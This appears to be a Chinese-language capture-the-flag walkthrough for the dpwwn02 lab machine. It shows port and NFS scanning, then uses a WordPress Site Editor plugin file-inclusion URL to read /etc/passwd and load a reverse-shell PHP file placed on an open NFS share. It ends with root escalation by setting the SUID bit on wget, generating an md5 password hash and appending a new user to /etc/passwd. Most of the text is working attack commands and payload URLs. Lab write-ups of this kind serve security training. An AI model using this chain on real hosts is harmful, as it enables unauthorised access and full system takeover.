|
此鏡像配置了靜態(tài)IP地址:10.10.10.10,需要調(diào)整下網(wǎng)絡(luò)
主機(jī)層掃描:
╰─ nmap -p1-65535 -sV -A 10.10.10.10
80/tcp open http Apache httpd 2.4.38 ((Ubuntu))
443/tcp open ssl/https Apache/2.4.38 (Ubuntu)
2049/tcp open nfs_acl 3 (RPC #100227)
34153/tcp open nlockmgr 1-4 (RPC #100021)
46643/tcp open mountd 1-3 (RPC #100005)
49509/tcp open mountd 1-3 (RPC #100005)
50875/tcp open mountd 1-3 (RPC #100005)
╰─ showmount -e 10.10.10.10
Export list for 10.10.10.10:
/home/dpwwn02 (everyone)
╰─ ls -laRt
.:
總用量 8
drwxr-xr-x 25 root root 4096 8月 14 17:59 ..
drwxr-xr-x 2 nobody nogroup 4096 8月 8 15:46 .
╰─ dirb http://10.10.10.10/
---- Scanning URL: http://10.10.10.10/ ----
+ http://10.10.10.10/index.html (CODE:403|SIZE:219)
+ http://10.10.10.10/index.php (CODE:200|SIZE:167)
+ http://10.10.10.10/server-status (CODE:403|SIZE:222)
==> DIRECTORY: http://10.10.10.10/wordpress/
╰─ wpscan --url http://10.10.10.10/wordpress/
** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
結(jié)合剛才的NFS 文件權(quán)限���,嘗試包含文件進(jìn)來
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/php-reverse.php
進(jìn)行提權(quán)操作
find / -perm -u=s -type f 2>/dev/null
which wget
ls -lha /usr/bin/wget
find /home -exec chmod u+s /usr/bin/wget \;
ls -lh /usr/bin/wget
-rwsr-xr-x 1 root root 460K Apr 9 13:35 /usr/bin/wget
本地下載passwd文件
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
╰─ openssl passwd -1 -salt hack pass123
$1$hack$22.CgYt2uMolqeatCk9ih/
追加到passwd文件末尾�����。
完��!
|
